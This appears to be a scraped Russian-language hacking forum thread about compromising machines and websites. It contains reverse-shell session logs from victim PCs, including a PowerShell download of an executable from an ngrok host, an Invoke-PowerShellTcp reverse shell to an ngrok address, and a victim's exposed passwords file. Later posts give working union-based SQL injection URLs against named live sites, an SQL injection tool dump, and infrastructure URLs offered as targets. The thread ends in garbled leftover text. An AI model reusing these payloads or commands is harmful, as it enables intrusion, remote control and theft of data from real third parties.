Вообщем, Некто парсит новые топики, на пастбине, дальше грузит к себе на сервер, и запускает. Вообщем у кого еслть желания разберайтесь, думаю можно сделать неплохой ресёрч

Не много иныф

----------------

User Name SID
============== ==============================================
lewis-pc\lewis S-1-5-21-3202183191-2836257581-1814123393-1000

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Users\Lewis\AppData\Local\Temp> whoami priv
PS C:\Users\Lewis\AppData\Local\Temp> Type "WHOAMI /?" for usage.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Users\Lewis\AppData\Local\Temp> net user

User accounts for \\LEWIS-PC

-------------------------------------------------------------------------------
Administrator Guest Lewis
The command completed successfully.

C:\Users\Lewis\AppData\Local\Temp
IEX http://84f9345a.ngrok.io -OutFile 'C:\Users\Lewis\AppData\Local\Temp\1.exe

------- ------ ----- ----- ------ -- -- -----------
75 8 1236 3884 0.02 1212 0 armsvc
123 10 15636 15272 0.16 892 0 audiodg
46 6 1244 3556 0.02 2152 1 conhost
454 10 1920 3792 0.13 328 0 csrss
250 10 2120 4996 0.30 372 1 csrss
73 8 1572 4356 0.03 1312 1 dwm
952 63 37456 58372 1.97 1348 1 explorer
0 0 0 24 0 0 Idle
492 19 3680 9256 0.23 472 0 lsass
141 7 2308 3876 0.05 480 0 lsm
48 8 1552 3560 0.00 1856 0 mscorsvw
348 31 77156 62716 2.64 2512 1 powershell
85 7 1804 4956 0.03 2780 0 SearchFilterHost
744 36 19840 14776 0.33 2564 0 SearchIndexer
313 11 2976 7824 0.03 2916 0 SearchProtocolHost
231 17 5700 8792 0.45 456 0 services
30 1 424 1080 0.11 244 0 smss
283 20 6432 10824 0.13 1036 0 spoolsv
405 26 10404 13184 0.13 280 0 svchost
368 14 4164 9036 0.31 580 0 svchost
254 15 3312 6840 0.13 660 0 svchost
432 22 19064 19320 0.44 744 0 svchost
392 22 5684 12784 0.19 784 0 svchost
911 41 13716 25576 0.75 812 0 svchost
528 35 9244 15620 0.08 964 0 svchost
318 34 11220 13584 0.38 1064 0 svchost
270 25 6148 47904 0.25 1540 0 svchost
519 0 176 860 3.98 4 0 System
180 17 3276 6648 0.06 1236 1 taskhost
203 17 7112 13392 0.13 2052 0 taskhost
82 10 1544 4264 0.47 364 0 wininit
114 9 3032 6920 0.23 404 1 winlogon
221 15 4856 12232 0.13 2656 0 wmpnetwk

PS C:\Users\FlbFPp4\Downloawhoami
whflbfpp4-pc\flbfpp4
PS C:\Users\FlbFPp4\Downloadswhoami \all
PS C:\Users\FlbFPp4\Downloads> Type "WHOAMI /?" for usage.

whoami /all

USER INFORMATION
----------------

User Name SID
================== ==============================================
flbfpp4-pc\flbfpp4 S-1-5-21-1264351168-1298790803-1785832424-1001

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

PS C:\Users\FlbFPp4\Downloads> ifconfig /all

USER INFORMATION
----------------

User Name SID
================== ==============================================
flbfpp4-pc\flbfpp4 S-1-5-21-1264351168-1298790803-1785832424-1001

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

PS C:\Users\FlbFPp4\Downloads> Invoke-PowerShellTcp : The term 'ifconfig' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At C:\Users\FlbFPp4\Downloads\wlhvxxquvwowuyy.ps1:128 char:1
+ Invoke-PowerShellTcp -Reverse -IPAddress 0.tcp.ngrok.io -Port 14179
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified:

) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShell
Tcp

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : FlbFPp4-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
Physical Address. . . . . . . . . : 00-07-E9-E4-CE-4D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::70e0:25bc:5a75:fd19%9(Preferred)
IPv4 Address. . . . . . . . . . . : 10.14.0.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.14.0.1
DHCPv6 IAID . . . . . . . . . . . : 33685504
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-57-92-96-00-07-E9-E4-CE-4D
DNS Servers . . . . . . . . . . . : 10.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled

PS C:\Users\FlbFPp4\Desktop> cat passwords.txt
9823hsdfvba
h23ug8fsfho32
1234abxc

redeyex · 16.02.2020

кто-нибудь разобрался? разве это не открытые данные?

BabaDook сказал(а):
YНа уязвимость года,века,минуты,секуунды не претендую, скорее мысли в слух.
Думю с таким подходим не долго будет музяка играть.
П.С было бы круто от кого-нить получить ресёрч
Код:
https://gitweb.torproject.org/
https://gitweb.torproject.org/admin/tor-jenkins.git/tree/config.xml
https://gitweb.torproject.org/admin/tor-nagios.git/tree/config/nagios-master.cfg
https://jenkins.torproject.org/user/nickm/my-views/view/All/job/tor-ci-windows-0.3.5/scmPollLog/
https://db.torproject.org/machines.cgi?host=buildbox

BabaDook · 07.03.2020

Free & Online File Converter - ConvertFiles.com

Powerful online file converter between multiple file formats. Supports 200 + Formats of documents, images, presentations, archive, audio and video files.

www.convertfiles.com

exploit

ffmpeg-avi-m3u-xbin/gen_xbin_avi.py at master · neex/ffmpeg-avi-m3u-xbin

Contribute to neex/ffmpeg-avi-m3u-xbin development by creating an account on GitHub.

github.com

BabaDook · 12.03.2020

Код:

http://www3.w-hs.de/JPR/lro/bp_neu.php?id=31233154+UnIoN+SeLEcT+1,2,(select(select+concat(0x3c2f7469746c653e,@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),4,5+--+-

http://cainskelton.com/joystickmapper/xbox-game.php?id=sdfsdf%27+UnIoN+SeLEcT+1,2,3,user(),5,6,7,8,9+--+-.
http://www.beautifulcard.com/en/newsDia.php?id=fgh' UnIoN SeLEcT 1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7,8,9,0,11,12--+-

Distruzione · 15.03.2020

У вас должно быть более 321 реакций для просмотра скрытого контента.

you are late, del

DrSleep · 15.03.2020

Код:

Target:    http://www.njrat.org/certificate/index.php?cert=%Inject_Here%c74bacdc
Date:    20.1.2020 г. 4:53:18
DB Detection:    MySQL >=5 (Auto Detected)
Method:    GET
Type:    String (Auto Detected)
Data Base:    2951625_njrat
Table:    users

Найденные интересеные SQL inj & XSS

HDD-drive

CD-диск

(L3) cache

HDD-drive

(L1) cache

(L3) cache

(L3) cache

RAM

RAM

(L1) cache

(L1) cache

Вложения

(L1) cache

RAM

RAM

(L1) cache

(L3) cache

(L1) cache

(L1) cache

RAM

(L2) cache